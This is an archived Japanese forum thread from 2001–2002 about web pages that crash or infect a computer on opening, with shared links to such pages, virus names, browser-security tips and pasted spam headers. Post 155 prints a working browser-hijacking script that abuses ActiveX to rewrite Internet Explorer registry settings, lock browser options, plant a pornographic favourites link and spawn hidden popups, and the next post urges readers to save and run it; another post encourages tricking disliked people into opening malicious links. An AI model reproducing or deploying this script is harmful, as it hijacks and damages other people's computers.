01/07/11 19:36
開いただけでPCがハングアップするページはありますか?
2:名無しさん@お腹いっぱい。
01/07/11 19:37
あなたの心です
3:名無しさん@お腹いっぱい。
01/07/11 19:40
あなたの人生です
4:名無しさん@お腹いっぱい。
01/07/11 19:46
この板、まったりしていてイカすなあ
5:名無しさん@お腹いっぱい。
01/07/11 19:49
http://(略)/list.doc
6:
01/07/11 19:50
関係無いけど、hsjさん、海外でも話題になってるね。IISエクスプロイチー
の件で。
7:名無しさん@お腹いっぱい。
01/07/11 20:00
sage
8:名無しさん@お腹いっぱい。
01/07/11 20:38
私は便器です。
9:どうよ?
01/07/11 21:26
URLリンク(samurai-x.hypermart.net)
10:名無しさん@お腹いっぱい。
01/07/11 21:35
↑IP抜かれるだけだし俺にはもう効かん
11:名無しさん@お腹いっぱい。
01/07/11 21:39
聞いただけでウイルスに感染するページ
12:名無しさん@お腹いっぱい。
01/07/11 22:51
URLリンク(easyweb.easynet.co.uk)
どうぞ
13:名無しさん@お腹いっぱい。
01/07/11 23:52
age
14:名無しさん@お腹いっぱい。
01/07/12 03:52
>>12
こわい!
15:名無しさん
01/07/12 04:08
>>12
W97M.Melissa.A
16:名無しさん@お腹いっぱい。
01/07/12 05:42
yeds
17:名無しさん@お腹いっぱい。
01/07/13 17:53
開いただけでウィルスに感染するページへの
リンク集です。ここで収集して嫌なやつにそのURLを
どんどんクリックさせてしまいましょう!!
URLリンク(members.tripod.co.jp)
18:17
01/07/13 18:06
間違えました!上のURLはまったく関係ない所でした。
正しくはここです。
URLリンク(www.ad-office.ne.jp)
19:17
01/07/13 21:46
また間違えました!
上のURLは全然別のものでした。正しくは元の通り
URLリンク(members.tripod.co.jp)
ここです。
20:17
01/07/13 21:58
はぁ~偽物uzee
まぁ見ればわかると思うけど、正しくは↓ね。
URLリンク(www.ad-office.ne.jp)
21:17
01/07/13 22:06
ホンモノの17はsageません。
したがって20はニセモノです。
20のサイトはただの宣伝です。注意。
22:名無しさん@お腹いっぱい。
01/07/13 22:07
ブラクラ張るな!
対象URL=URLリンク(members.tripod.co.jp)
--------------------------------------------------------------------------------
FDDアタック / conconクラッシャー [HTMLタグ,JavaScript]
IMGタグやJavaScript等によりfileスキーマを参照します。
フロッピーディスクドライブへの不用なアクセスが続いたり,
ブラウザの設定によってはOSがクラッシュする可能性があります。
23:善人
01/07/13 22:10
宣伝手伝うよ
〒292-0045 千葉県木更津市清見台3-1-11 アドオフィス
TEL&FAX 0438-25-7643
E-Mail info@ad-office.ne.jp
24:名無しさん@お腹いっぱい。
01/07/13 22:17
NEXTWEBに直接電話した方が早い
25:名無しさん@お腹いっぱい。
01/07/13 22:18
>>22
ソース見た限りではオンラインカジノらしいけど・・・
開いたらやヴぁいのか怖いなー
26:名無しさん@お腹いっぱい。
01/07/13 22:22
ふ~んNEXTWEBの鯖は、公序良俗に反することは禁止なんだ
27:名無しさん@お腹いっぱい。
01/07/13 22:28
小僧相手に大人の対応しすぎ(w
28:名無しさん@お腹いっぱい。
01/07/13 22:41
____
/∵∴∵∴\
/∵∴∵∴∵∴\
/∵∴∴,(・)(・)∴|
|∵∵/ ○ \|
|∵ / 三 | 三 | / ̄ ̄ ̄ ̄
|∵ | __|__ | < >>17 消えろバカ
\| \_/ / \____
\____/
29:名無しさん@お腹いっぱい。
01/07/13 22:44
突然子供の対応になったな(w
まあ好きにやれや
30:名無しさん@お腹いっぱい。
01/07/14 01:12
反省の色無しか・・・
コピペ厨房もいい加減にしろ
31:名無しさん@お腹いっぱい。
01/07/14 04:34
>>10~30 (ただし9は除く)
インターネット喫茶から開いたけど何も起こらなかったよ。
32:名無しさん@お腹いっぱい
01/07/14 21:38
210.178.180.226,sunrpc
ここ。
33:名無しさん@お腹いっぱい
01/07/14 21:38
133.31.40.42,auth
ここも良いよ。
34:
01/07/14 22:20
>>32
ソコのさーばーって、111がhttpなの??
35:名無しさん@お腹いっぱい。
01/07/15 01:12
このURLはどうなんでしょうか?
何でも入ったらCドライブの中身を消されてしまうらしくて・・・
これのせいであるスレッドの住人が疑心暗鬼になっています。
ブラクラじゃないって言う人と実際に入ってCドライブ消されて怒っている人が半々で・・・
URLリンク(www.bigfreehost.com)
自分も恐くてクリックしていません。
36:名無しさん@お腹いっぱい。
01/07/15 01:31
>>35
フレーム使った、最高にくだらないブラクラもどき。
消されたって言ってるのは、わかってる奴がネタでいってるだけ
37:名無しさん@お腹いっぱい。
01/07/15 01:46
URLリンク(www.rental-web.com)
なんすか?マジで
38:名無しさん@お腹いっぱい。
01/07/15 01:51
>>37
なんすかって言われてもなあ・・・
ちょっとしたいたずらみたいなもんだよ。
そこのサイトは問題あるサイトじゃないし。
つーかブラウザのセキュリティ設定はちゃんとしとこうな
39:マジね
01/07/15 02:19
>>38
ブラウザのセキュリティ設定ってなんですか?串ですか?ファイアーウォールですか?
馬鹿げた質問ですみません
40:名無しさん@お腹いっぱい。
01/07/15 02:32
このページって何ですか?
すごく役立つことが沢山かいてあるのですが、
皆に嫌がられているようで意味が分かりません。
とろあえずブラクラではないようです。
URLリンク(members.tripod.co.jp)
41:名無しさん@お腹いっぱい。
01/07/15 02:33
>>39
Java、ActiveX、アクティブスクリプト、クッキーとかを
実行させるかどうかってこと。Java、ActiveXなんかは
切って当然ってぐらいだけど、アクティブスクリプト、
クッキーも結構厄介なもんだから、ダイアログを出すぐらいに
しといたほうが確実。かなり面倒だけど
まあそこらへんの設定のやり方は初心者板とかで聞いてくれや。
さすがにIEの設定まで教えてられん
42:名無しさん@お腹いっぱい。
01/07/15 02:34
______
/_ |
/ \ ̄ ̄ ̄ ̄|
/ / ― ― |
| / - - |
||| (6 > |
| | | ┏━┓| / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| | | | ┃─┃| < 正直、 >>40 消えてくれ。
|| | | | \ ┃ ┃/ \________________
| || | |  ̄  ̄|
43:名無しさん@お腹いっぱい。
01/07/15 02:36
>>40
昨日のやつか?まだ懲りてないなら、
「大人の対応」させてもらうが。
44:マジね
01/07/15 02:38
>>41
感謝です
45:名無しさん@お腹いっぱい。
01/07/15 02:52
>>43
邪魔ものは氏ね
46:名無しさん@お腹いっぱい。
01/07/15 03:06
邪魔物はお前だろうが(藁
まぁせいぜいアクセス制限掛けられないようにな
47:名無しさん@お腹いっぱい。
01/07/15 03:08
>>46
これは多分別人。ほっとけばいい。
48:名無しさん@お腹いっぱい。
01/07/16 02:07
URLリンク(hpmboard1.nifty.com)
49:名無しさん@お腹いっぱい。
01/07/16 16:52
50:あぼーん
あぼーん
あぼーん
51:名無しさん@お腹いっぱい。
01/07/17 16:52
>>50
スーパーハカー発見。
52:名無しさん@お腹いっぱい。
01/07/17 17:32
リンクたどっただけとの噂
53:>50
01/07/19 23:39
凄い!ほんとスーパーハカーどうぢてこんなことが可能なのか?
尊敬!
54:>36
01/07/20 16:25
>35さんのURL、他の板でウイルスだとか逝ってましたが
どんな悪さをするんでしょうか?
55:浅野 哲
01/07/20 16:30
centaur412@jcom.home.ne.jp
何でも良いから送ってね~
56:浅野 哲
01/07/20 16:31
マジでお願い~
57:名無しさん@お腹いっぱい。
01/07/20 16:39
>>55-56
あはは。無駄だよ~。
58:名無しさん@お腹いっぱい。
01/07/20 19:28
だからなんもしねえっての。
人の言う事信じられないなら自分でソース見て考えろよ
59:名無しさん@お腹いっぱい。
01/07/20 19:29
ただ繰り返しドライブがカタカタ言うだけ。
ctrl+alt+delで殺して終わり。
60:名無しさん@お腹いっぱい。
01/07/26 03:30
61:
01/08/03 15:55
______
/_ |
/ \ ̄ ̄ ̄ ̄|
/ / ― ― |
| / - - |
(6 > |
┏━┓| / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
┃─┃| < 正直、 >>40 消えてくれ。
\ ┃ ┃/ \________________
 ̄  ̄|
62:名無しさん@お腹いっぱい。
01/08/03 17:02
>>61
激しくずれています。男斗水鳥拳??
63:あぼーん
あぼーん
あぼーん
64:名無しさん@お腹いっぱい。
01/08/04 00:28
URL貼れば誰か荒らしてくれるとでも思ってんの?
65:名無しさん@お腹いっぱい。
01/08/04 04:35
>>63
君の心が荒れているのだよ
66:sage
01/08/04 04:51
>>65
うまい!!
67:名無しさん@お腹いっぱい。
01/08/04 14:56
URLリンク(edit.my.yahoo.co.jp)
68:名無しさん@お腹いっぱい。
01/08/05 14:13
ttn8iv524g@mx4.ttcn.ne.jp
このひとから、おくられてきました。
パソコンがおわりました。
69:名無しさん@お腹いっぱい。
01/08/06 18:39
203.165.230.223
70:MKinch
01/08/06 19:21
URLリンク(easyweb.easynet.co.uk)
開くなよ
71:名無しさん@お腹いっぱい。
01/08/06 21:27
>>70
あなたは感染ファイルのダウンロードを試みようとしています(藁
72:名無しさん@お腹いっぱい。
01/08/07 00:36
>>70-71
これって続行したらどうなるの?WinMeでも感染しちゃうのかな>>happy99
73:名無しさん@お腹いっぱい。
01/08/07 01:59
>>72
キレイな花火を見ようョ!(ワラ
74:名無しさん@お腹いっぱい。
01/08/07 02:41
---------------------------
Norton AntiVirus
---------------------------
Norton AntiVirus は Happy99.Worm ウィルスを以下の場所で検出しました
ファイル名: (略)\Temporary Internet Files\Content.IE5\W1AFG9IF\Happy99[1].exe
ドメイン名:(秘密)
システム名: (秘密)
ユーザー名:(秘密)
このファイルを修復できません。
---------------------------
OK
---------------------------
75:名無しさん@お腹いっぱい。
01/08/08 07:42
URLリンク(easyweb.easynet.co.uk)
開かない方がいいかも。。。
76:名無しさん@お腹いっぱい。
01/08/21 21:24
>>75
それ何?
拡張子mp3で感染することなんてあるの?
77:(゚Д゚)ハァ?
01/08/21 21:36
>>75
MTXだって(W
本当の拡張子.pifでしょ。
78:偽天
01/08/21 21:51
バインド?
79:名無しさん@お腹いっぱい。
01/08/21 22:58
3 名前:正直、スマンカッタ 投稿日:2001/08/21(火) 15:05
修正 & McAfeeにパクられました
URLリンク(slashdot.jp)
McAfeeウィルス対策をコピペでぱくる
URLリンク(www.iosnet.ne.jp)
80:あげ
01/08/22 07:51
ぱくりアゲ
81:初心者
01/08/22 10:43
感染するとどうなるんですか?
あとQ2とかは勝手にインストールされてしまうらしいって
聞いたのですが、よくわかりません。
教えて下さい。
簡単なチェック方法きぼ~~ん
82:名無しさん@お腹いっぱい。
01/08/22 14:24
>>75ってクリックするだけで感染しますか?
83:名無しさん@お腹いっぱい。
01/08/22 15:13
>>81
変に設定を緩めてなければ、勝手には・・そうそうない。
クリックしなけりゃ大丈夫
でも、こんな巧妙なパターンを仕掛けられると、クリックする可能性あるね。
URLリンク(www.police.pref.osaka.jp)
あと、ウイルス等には、この設定を緩めるもの居るので要注意。
84:名無しさん@お腹いっぱい。
01/08/22 15:25
ポートスキャンされてる時にゾーンアラームなどの
ファイアウォールソフト入れてないと侵入されますか?
85:
01/08/22 15:28
>>82
ブラウザぢゃ開けないよ。あくまでMP3として認識するみたいね。
ってーか、拡張子けづってあるのか??>hiros
ローカルに保存して実行するのはよした方が良いね。一応念のため。
>>83
その表示でる頃には我慢汁出てるから。。巧妙だね。
86:名無しさん@お腹いっぱい。
01/08/22 16:01
おまえなんでまだ居るんだよ
いい加減自首してくれ
87:◇GSxyaeQs
01/08/30 14:25 fCYyGEEg
僕のポテトはチンチンチン
チンチンポテトマイクロマジックー♪
88:名無しさん@お腹いっぱい。
01/08/30 15:53 q9bARPwE
>>87
30代発見。
89:名無しさん@お腹いっぱい。
01/08/30 16:37 ruy2juu2
俺昔MP3ダウンロードしたとき、ファイルサイズが5Mにもなるのに、
音が鳴らなかった。他のファイルは音が鳴るのに、それだけはダメだった。
やばいと思って再インストールしたが、あれはウイルスだったんだろうか…
90:名無しさん@お腹いっぱい。
01/08/30 17:38 TVg1npA.
>>89
ネタでしょうが、ウィルスなはずが無いです。仮にウィルスのコードが埋め込まれていうようが
実行ファイルでないのでウィルスを起動できません。
何かの偽装ファイルじゃないでしょうか
91:tomo
01/08/31 14:57 4t1V4bfM
あったらほしいんだけど。
92:名無しさん@お腹いっぱい。
01/09/01 17:50 ozIMKsQc
>>28最高にワラタ
93:89
01/09/02 00:43 wivt7Qp.
>>90 それが再生できるんで…
それからさっぱりアングラMP3はダウソしてない。
94:名無しさん@お腹いっぱい。
01/09/02 00:45 3OHXOh8o
マルチポスト スマソ
アップローダーにある、この圧縮ファイルなんですか?
解凍するとエラー出ます。エラー出たファイル削除できなねー。
URLリンク(www15.big.or.jp)
95:名無しさん@お腹いっぱい。
01/09/02 03:14 pbL3/KjU
しつもん。
>>50 ってマジ?
マジなら凄いんじゃない?
なぜみんなもっと驚かない?
96:名無しさん@お腹いっぱい。
01/09/02 03:34 9WIIuGkY
リンクたどって調べただけだからね
97:名無しさん@お腹いっぱい。
01/09/07 01:54
>89
それ、バイナリエディタとかでデータ確かめてみた?
俺も似たようなことあったよ。
KturnってとこからダウソしたMP3、再生しても音ならず。
なして?と思ってデータ確かめたら、ヘッダはあれど肝心の音データは
全部000000000・・・・・・・・・・・だった。
おっそろしく回線細く、数時間かけて落としたのに・・・
そこにあった別のMP3はちゃんとしてたから、UPした人のポカミスか??
意味分からん・
98:名無しさん@お腹いっぱい。
01/09/07 02:05
>>93
インプラント系偽装でしょ
表向きはmp3だけど中に他のデータが入ってるの。
割れとかで良くある。
99:
01/09/07 04:52
W97M.Melissa.A
に感染したらどうなるの?
さっき踏んじゃってさ、オイラのPC染みちゃってるのさ。
100:名無しさん@お腹いっぱい。
01/09/07 22:04
>>1
注:類似スレ警報!
これからはこちらへ
URLリンク(ton.2ch.net)
101:名無しさん@お腹いっぱい。
01/09/10 23:00
URLリンク(www.geocities.co.jp)
102:(´Д`;)
01/09/10 23:30
>>101
<script language="javascript">
w=window.open("URLリンク(#)<)全く・・・・/newtype/list.doc");
</script>
<script language="javascript">
w=window.open("7777.htm");
</script>
ココで引っかかる奴は居まいと思うけど。。。
103:( ̄ー ̄)
01/09/10 23:59
この前ブラクラで再起動したら変な画面出たよ、
英語でなんか「yes,no]って書いてあったからノーにしといた。何だったんだか気になる。
104:あぼーん
あぼーん
あぼーん
105:名無しさん@お腹いっぱい。
01/09/11 14:13
↑犯罪者発見。
106:これ何?
01/09/11 14:15
URLリンク(members.tripod.co.jp)
107:名無しさん@お腹いっぱい。
01/09/11 14:40
>>106
javascriptをonにしてなければ怖くない。
onにしてると、オトコの裸画像数点+VBS.LoveLetter.CI+W95.MTX.dr+ウィンド無限オープン。
108:
01/09/11 15:20
>106
URLリンク(page3.auctions.yahoo.co.jp)
競泳パンツも買って欲しいんだよ(w
・・にほひ付き?
109:名無しさん@お腹いっぱい。
01/09/11 19:03
***/*****
***?
***
***
***
110:名無しさん@お腹いっぱい。
01/09/12 23:35
>>103
心配だったらOS再インストールするほうがいいんじゃない?
とりあえずウイルススキャンしたほうがいいですね。
111:http://ojiji.net/ntv/
01/09/13 03:19
URLリンク(ojiji.net)
URLリンク(ojiji.net)
112:名無しさん@お腹いっぱい。
01/09/13 04:46
>>111はブラクラ
113:怖いね
01/09/14 21:43
先月から今月にかけてMP3のsma****anet逝ったやつはどうだった?
運が悪いことに最近mcafeeのサポートが切れてアンインストールしてた。
俺はjava他全て切ってたけど感染する寸前だったよ。
途中で変に読み込み遅かったから気が付いたからよかったけど。
再起動したら壁紙変えられた。
haptimeとか言うやつで。
開いただけで感染するページあるんだなと思った。
114:名無しさん@お腹いっぱい。
01/09/16 20:54
亀スレならすまんが、相手のコンピューター破壊できるウイルスと
どんな警戒厳重なコンピューターでもハッキングできる方法教えてくれ。
開いただけで感染するなんて、メチャ欲しいんだけど
115:名無しさん@お腹いっぱい。
01/09/16 21:20
>114 狂牛病?
116:名無しさん@お腹いっぱい。
01/09/16 21:21
>>114
____ ____
|自分で| ___ |見つけた |
|さがせ:|Λ_Λ |イッテヨシ| Λ_Λ|ら報告 |Λ_Λ
〃  ̄ ∩ ´∀`)〃 ̄ ∩ ゚Д゚)〃  ̄ ̄ ∩ ・∀・)
ヾ. ) ヾ | ヾ. )
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ \
\ \
| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
| スレッド評価認定委員会: |
| |
\| |
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
117:名無しさん@お腹いっぱい。
01/09/16 22:28
GodmessageとかNood4ってどうなのよ?
感染した人いる?
118:ななし
01/09/17 00:49
URLリンク(www.excite.co.jp)
↑これってブラクラなんですか?
119:名無しさん@お腹いっぱい。
01/09/17 00:59
モロ、無修正画像サイト発見!
URLリンク(www.sex-jp.net)
URLリンク(www.sex-jp.net)
URLリンク(www.sex-jp.net)
URLリンク(www.sex-jp.net)
120:名無しさん@お腹いっぱい。
01/09/18 02:08
初心者質問スレにも書きこんじゃったけど、
URLリンク(isweb27.infoseek.co.jp)
ここって何だろ?本当に飛んだだけで感染するもんなのかな?
121:名無しさん@お腹いっぱい。
01/09/18 02:39
そんな事いわれたら飛べない・・・
122:名無しさん@お腹いっぱい。
01/09/18 17:50
>>120のリンク、ノートンから警告バシバシ出てます。
VBS.Haptime.A@mm ウイルスだそうです。
飛びたい人は
URLリンク(www.trendmicro.co.jp)
これを読んでからどうぞ。
123:名無しさん@お腹いっぱい。
01/09/18 17:54
しかし、>>120って無責任なヤツだな。
市ね。
124:120
01/09/18 21:38
直リソ&説明不足スマソ。
たまたま巡回してて、↑のサイトに飛んだら突然ノートン先生が
警告したのでビックリして、気が動転していたようです。
身をもって体験して来たんですが…。
結果からいうと、どうやら『自分は』感染しなかったようです。
ノートンで何度もスキャンしたし、haptime専用駆除ツールも使ってみた
のですが、一切検出されませんでした。
しかし、だからといって他の人が安全とは限りませんので、
自分で直林しといていうのもなんですが、
決して不用意にクリックしないでください。
今まで自分は飛んだだけでウィルスに感染するとは思っていなかったので、
ノートンで警告が出て??だったので、なにも知らずにリンク張ってしまい
すいませんでした。
しかし、飛んだだけでウィルスに感染なんて怖いですね。
みなさんも気をつけてください。なんでもない安全なサイトでも
感染していることがあるようですから。
125:
01/09/19 12:01
なんとタイムリーなスレタイトルじゃのう
126:名無しさん@お腹いっぱい。
01/09/19 12:16
>>124
不用意にリンクをクリックする奴も悪い。
ここの住人は引っかかったりしないから気にするな
127:名無しさん@お腹いっぱい。
01/09/19 12:29
ごめ、俺おみとろん入れてから不用意にクリックしまくってるよ。
んで120はまだ踏んでないけど、ActiveXとかJSオフとかでも感染するの?
どういうしくみなんだろ?つか>122のリンク先がおかしいんだけど・・・
128:名無しさん@お腹いっぱい。
01/09/19 12:39
>>127
URLリンク(www.trendmicro.co.jp)
全部更新中?
129:名無しさん@お腹いっぱい。
01/09/19 13:43
お粗末msn さらしあげ。
130:名無しさん@お腹いっぱい。
01/09/19 17:31
お粗末マイクロソフト さらしあげ
131:名無しさん@お腹いっぱい。
01/09/20 00:31
こんかいのNimdaでもトレンドマイクロ対応遅かったね。
これでウイルスバスターがクソだということがハッキリしたよ。
132:名無しさん@お腹いっぱい。
01/09/20 00:40
ウイルスっていうか、マイ糞のバグだからマイ糞が悪い。
マイ糞のセキュリティ=ヤリ○ン女
133:sage
01/09/20 02:43
あげ
134:名無しさん@お腹いっぱい。
01/09/20 09:18
どうしてみんなは
「Windowsが欠陥品である」
と言うことに気がつかない?
見ただけで勝手に何かを実行するなんて言う考えは
根本的に間違い。
こんな基地外であるMicro$oftは、早く潰れて下さい。
1番悪いのは、ビルゲイツです。
商売以外にももうちょっと頭使って下さい
で2番目にに悪いのが、ウィルス作成者。
いくらWindowsがショボイと言っても、
そんなことやってはいけません。
3番目に悪いのは、それに気がつかずM$製品を使う
厨房ユーザー(藁
135:名無しさん@お腹いっぱい。
01/09/20 09:43
URLリンク(www.qingpao.com)
136:名無しさん@お腹いっぱい。
01/09/20 09:46
>>134
シャネルみたいなもんでねえの?
137:
01/09/20 10:54
>>134
WindowsNTを使うにせよ、IISをやめてApacheでやってくれてたら
防げた被害なんですけどね、最近のCodeRedとかNimdaは。
それはともかく、感染したオリコ URLリンク(www.orico.co.jp)
のトップページには、「お知らせ」と題して、
9/19 11:30~21:30までの間、システムメンテナンスの為
サーバを停止しました。ご迷惑をお掛けして申し訳ござい
ませんでした。
と書いてあるよ。迷惑かけたのはサーバ停止じゃなくって
ウイルス感染の踏み台になったことだっていうのに、一言
もなし。どうよこれ。
138:
01/09/20 11:15
>>137
ほんとか?
クライアントのPCが感染していて書き換えられたHTMLファイルをApacheサーバーに
アップロードして公開すれば、Apacheだって加害者になるんじゃないのか?
ワームとしては感染しなくてもクライアントがWindowsなら危険度は変わらないと思うが。
139:名無しさん@お腹いっぱい。
01/09/20 11:18
>>137
コンテンツ作成者のPCに感染して、HD 内の HTML を汚染されて、それを
apache (UNIX でも何でも) なり何なりに upload して公開した時点で
加害者になると思われ。
140:名無しさん@お腹いっぱい。
01/09/20 11:24
IEでJavaScript切るのはどうやるんですか?
141:名無しさん@お腹いっぱい。
01/09/20 11:41
>>138-139
自動で増殖する機構がないぶんヨホードましかと思われ。
142:名無しさん@お腹いっぱい。
01/09/20 11:44
>>137
ApacheはNimdaの影響で落ちるらしいよ。
143:名無しさん@お腹いっぱい。
01/09/20 11:47
漏れ、19日の朝、建築ナビってHPみたら、Readme.exeもらいました。
HPは現在落ちてるもよう。
McAfee ウイルススキャン Ver. 5.13aの最新Datファイルで削除したよ。
7匹もいた。でも*.emlはそのまま130個もあったよ。即削除。全部80.0KBだった。
あれはウィルスの卵だね。ダブルクリックすると生まれるよ。
144:名無しさん@お腹いっぱい。
01/09/20 12:10
>>138
ダウンロードすべき本体がいないと思うが。
145:名無しさん@お腹いっぱい。
01/09/20 12:12
>>142
それはApacheログがHDDを圧迫して落ちるらしい。
同じIPで4段5段のアタックをかましてくるからなぁ。
nimdaウザッ
146:
01/09/20 12:19
phpウイルスの作成ツール出たら、どうなる事やら。。。
147:名無しさん@お腹いっぱい。
01/09/20 12:35
>>145
うちじゃ,logrotate.conf を daily にしたよ.しゃあ
ないわね.
148:名無しさん@お腹いっぱい。
01/09/20 13:52
かちゅーしゃでも感染するんですか?
149:名無しさん@お腹いっぱい。
01/09/20 20:47
>>140
やれやれ.....。
そういう人はブラウザのセキュリティレベルを「高」に設定しておきな。ワクチンもきちんと更新しろよ。
150:nimda
01/09/20 22:42
URLリンク(www.hyundaijapan.co.jp)
151:あぼーん
あぼーん
あぼーん
152:
01/10/17 22:35
>>151
どうせ、むかつく奴とかのメアドだろ・・・
はい、そうですか と送るバカいるのか?
153:影猫
01/10/31 01:36
JS.Exception.Exploit
URLリンク(www.clubtgp.com)
詳細情報
URLリンク(www.symantec.com)
154:FUCK usa
02/01/01 23:10
URLリンク(influence.org)
155:IE StartPageGen
02/01/01 23:42
<!--IPT language=JavaScript
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent </APPLET ");
function AddFavLnk(loc, DispName, SiteURL){var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");Shor.TargetPath = SiteURL;Shor.Save();}
function f(){
try{a1=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl =
a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");a1.createInstance();FSO =
a1.GetObject();a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Net = a1.GetObject();
try{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "URLリンク(www.ebcvg.com)");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar", "URLリンク(www.ebcvg.com)");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page", "URLリンク(www.ebcvg.com)");
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserOptions", "1");
var WF, Shor, loc;WF = FSO.GetSpecialFolder(0);loc = WF + "\\Favorites";if(!FSO.FolderExists(loc)){
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";if(!FSO.FolderExists(loc)){return;}}
AddFavLnk(loc,"FREE Forbidden Lolitas Porno","URLリンク(freepics.place.cc)<)","URLリンク(www.ebcvg.com)");
catch(e){}}
catch(e){}}
function vx() {
var xxx=window.open('');
xxx.blur();
xxx.location="out.php";}
window.onerror=new Function("self.close();return true");
setTimeout("f()",1000);setInterval("vx()",40000);self.moveTo(5000,5000);self.blur();
setTimeout("window.onfocus=setIt;",300);
function setIt(){
self.moveTo(5000,5000);
self.blur();return false;}
if(document.all) document.onmousedown = setIt;
else if(document.layers){
window.captureEvents(Event.MOUSEDOWN);
window.onmousedown=setIt;}
function xit() {
window.open('xex.html');window.open('out.php');}
</SCRI-->
156:名無しさん@お腹いっぱい。
02/01/01 23:47
>>155 のソースをメモ帳で拡張子HTMLで保存。 そして実行する
157:ASL
02/01/02 16:36
なんか…
158:名無しさん@お腹いっぱい。
02/01/02 16:37
これも
159:ASL
02/01/02 16:48
あれですね。
160:ASL
02/01/02 16:49
YAHOOのニュースにあった。
URLリンク(headlines.yahoo.co.jp)
161:な
02/01/02 17:21
yahooもアホ揃いか。
162:
02/01/02 18:30
URLリンク(www.gokhu.com)
163:名無しさん@お腹いっぱい。
02/01/02 19:23
view-source:URLリンク(www.iespana.es)
ここに開いただけで感染するようなトロイは仕込まれているでしょうか。
164:findlu@21cn.com
02/01/02 22:29
From:Hypnosis < thebvg@lists.thebvg1.net >
To: computertips-feedback@developingdots.com
Subject:Give Hypnosis for the Holidays!
Date:***
Received: from [64.37.121.131] by developingdots.com with ESMTP id ***; Mon,***
X-Info:To report abuse forward this mail to thebvg@complaints.em5000.com . Please include all mail header fields!
Message-ID: < 7896456314jkhbjikgyv846786@exploder2.em5000.net >
-----
To unsubscribe click here and enter your email address.
If the above link does not work, please copy and paste this address into
your browser window:
URLリンク(www.em5000.com)
165:名無しさん@お腹いっぱい。
02/01/03 06:49
YAHOO!のNEWSからきました!
166:
02/01/05 00:37
URLリンク(members.fortunecity.com)
ここってどうですか?
167:名無しさん@お腹いっぱい。
02/01/05 02:35
なんかいろんな所で>>155が紹介されてるけど
これってインターネット上にある場合は警告でない?
見ただけでは問題ないと思うけど。
そりゃ保存してローカル権限でみたらまずいだろうけど。
168:
02/01/05 02:50
だから、ネット上には保存してローカル権限で見させるページ作ればいいんじゃんか
169:167
02/01/05 02:54
>>168
それができれば苦労しないが。(何の苦労だか(w
それともなんかローカル権限で見させるセキュリティーホールでも有るの?
170:
02/01/05 13:53
>>169
あふぉ、それくらい自分で作れないなら逝ってよし
171:167
02/01/06 00:13
>>170
だからそれが出来たら大問題でしょ。
古いセキュリティーホール使ってやるって事なら出来ないと一緒。
作れるならどうやって作るか説明してくれ。
俺はせいぜいGetHTMLとかのツールでサイトを丸ごと落とさせるような
サイトを作ってそこに仕込むぐらいの事しか思いつかん。
172:名無しさん@お腹いっぱい。
02/01/06 01:42
URLリンク(www.top.or.jp)
こんな事やめてくれ。
173:名無しさん@お腹いっぱい。
02/01/07 00:24
Received: from mta05-svc.ntlworld.com (62.253.162.45) by *** with SMTP; 00 *** (JST)
Received: from lkgu78guoi ([62.255.154.129]) by mta05-svc.ntlworld.com (InterMail vM.4.01.03.23 201-229-121-123-20010418) with SMTP id <30011332240161.MANKO.mta05-svc.ntlworld.com@vkhyify67tdt>; *** +0000
Date:*** From: realwealth@maxleft.com
Message-ID:< 30011332240161.MANKO@mta05-svc.ntlworld.com >
Subject:It's time to STOP just making ends meet!!
-----
ELIMINATE DEBT--(credit cards,car loans, home loans,school loans)
CREATE WEALTH--With IMMEDIATE, EXTRODINARY & RESIDUAL income!
PROTECT ASSETS--Build & preserve a financial foundation!
Would you investigate it??
If you think it's "too good to be true" let me say this....
"A Wise Man Will Investigate What A Fool Takes For Granted!"
and "Timing Beats Out Talent Each and Every Time!"
For INSIDER INFORMATION:
email realwealthin2002@yahoo.com
Name: Email: Country:
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to realwealth@maxleft.com ...Thanks
URLリンク(www.em5000.com)
URLリンク(www.em5000.com)
-----
mta05-svc.ntlworld.com
<<< 220 mta05-svc@ntlworld.com ESMTP server (InterMail vM.4.01.03.23 201-229-121-123-20010418) ready ***
>>> HELO rlytest.nanet.co.jp
<<< 250 mta05-svc@ntlworld.com
>>> MAIL FROM:<"TEST URLリンク(www.nanet.co.jp) requested from pc1-cowc2-0-cust129rencable-ntl-com@mta05-svc.ntlworld.com >
<<< 250 Sender <"TEST URLリンク(www.nanet.co.jp) requested from pc1-cowc2-0-cust129-ren-cable-ntl-com@mta05-svc.ntlworld.com > Ok
>>> RCPT TO:<rlytest@nanet.co.jp>
<<< 550 relaying mail to nanet.co.jp is not allowed
netmongol.com (pri=10) (maxleft.com)
<<< 220 X1 NT-ESMTP Server NetMongol.com (IMail 6.06 66407-6)
>>> HELO rlytest.nanet.co.jp
<<< 250 hello NetMongol.com
>>> MAIL FROM:<"TEST URLリンク(www.nanet.co.jp) requested from realwealth-maxleft-com@netmongol.com
<<< 501 unacceptable mail address
174:あぼーん
あぼーん
あぼーん
175:水泥棒!「「菊池記念館」」
02/01/07 03:15
